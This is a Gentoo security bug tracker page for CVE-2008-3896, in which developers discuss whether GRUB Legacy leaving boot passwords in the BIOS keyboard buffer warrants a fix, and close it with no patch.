Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 239547 (CVE-2008-3896) - sys-boot/grub<=0.97 authentication passwords problem (CVE-2008-3896)
Summary: sys-boot/grub<=0.97 authentication passwords problem (CVE-2008-3896)
Status: RESOLVED WONTFIX
Alias: CVE-2008-3896
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High minor (vote)
Assignee: Gentoo Security
URL: http://www.ivizsecurity.com/research/...
Whiteboard: A4 [upstream]
Keywords:
Depends on:
Blocks:
 
Reported: 2008-10-04 15:07 UTC by Stefan Behte (RETIRED)
Modified: 2008-10-20 19:14 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Stefan Behte (RETIRED) gentoo-dev Security 2008-10-04 15:07:20 UTC
CVE-2008-3896 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3896):
  Grub Legacy 0.97 and earlier stores pre-boot authentication passwords
  in the BIOS Keyboard buffer and does not clear this buffer before and
  after use, which allows local users to obtain sensitive information
  by reading the physical memory locations associated with this buffer.
Comment 1 Stefan Behte (RETIRED) gentoo-dev Security 2008-10-04 15:12:26 UTC
http://www.gnu.org/software/grub/grub-legacy.en.html
GRUB Legacy is not actively developed any longer. Only bugfixes will be made so that we can continue using GRUB Legacy until GRUB 2 becomes stable enough. If you want more features in GRUB, it is a waste of time to work on GRUB Legacy, because we never accept any new feature. Instead, it is better to take part in the development of GRUB 2.
Comment 2 Stefan Behte (RETIRED) gentoo-dev Security 2008-10-06 15:18:50 UTC
I got an answer:
fzielcke@z-51.de wrote:

"Hi,
there's no official fix for this and I doubt that there'll be ever one.
grub-legacy isn't maintained anymore.
If grub2 gets support for this password thing then the one implementing
it should take care of this."

Well - grub 2 isn't out, but we've got 1.96 in the tree...


Comment 3 Stefan Behte (RETIRED) gentoo-dev Security 2008-10-07 11:56:31 UTC
I got another mail, this time from chaac@nic.fi:

"Hi Craig,

a) No-one is really working on grub legacy.

b) The details? If it is previous "hack" to modify grub or bios in order
attack vector to be usable, we do not really see this as a grub problem
as grub and bios is not then in authentic state and that problem needs
completely different protection.

If it is about password visible in memory; in most OSes you require root
privileges in order to read memory so at that point the game is already
lost as attacker can do anything anyway.

I have nothing against clearing memory having the password input. But I
do not see anyone making any changes to grub legacy. For grub 2 the
story is completely different of course.

Thanks,
Vesa Jääskeläinen"
Comment 4 Robert Buchholz (RETIRED) gentoo-dev 2008-10-19 19:42:54 UTC
Since root privileges are required to see the password, and root could overwrite the boot loader anyway, no trust boundaries are crossed. Closing INVALID.
Comment 5 Stefan Behte (RETIRED) gentoo-dev Security 2008-10-19 21:10:28 UTC
This is not about overwriting the bootloader.

I hope I understood everything correct:
When using full-hd-encryption, the pre-boot password should be used to decrypt the master key, and that decrypted key will be used by the OS to access the crypted data, the plaintext password should be deleted (overwritten) from memory.

So this grub bug could lead to plain text password disclosure.

Scenario:
- Someone gets root access to your corporate ultra-secure server (which has full-hd-crypto & grub password protection)
- he gets the plaintext password with the methods described in the preboot_whitepaper.pdf
- he scans your network and uses that password to access other machines

He could not have done that with the decrypted master key as it isn't the plaintext you enter at the preboot authentication prompt, neither with the grub password, because it is not saved on HD, there is only a MD5-hash on disk.

Sure that's a bit unlikely; he could also modify the (pre)bootloader to store the password on HD, reboot the machine and wait for the sysadmin to enter the password but that would...
a) be noticed immediately
b) more much more complex than copying & pasting code from the preboot whitepaper

I would have agreed to RESOLVED WONTFIX, but not to INVALID. ;)
Comment 6 Robert Buchholz (RETIRED) gentoo-dev 2008-10-20 19:13:48 UTC
(In reply to comment #5)
> I would have agreed to RESOLVED WONTFIX, but not to INVALID. ;)

I can see your point here, but you are screwed if someone gets root on a box anyway, and using the same password for different keys is not a good scheme to protect confidentiality either.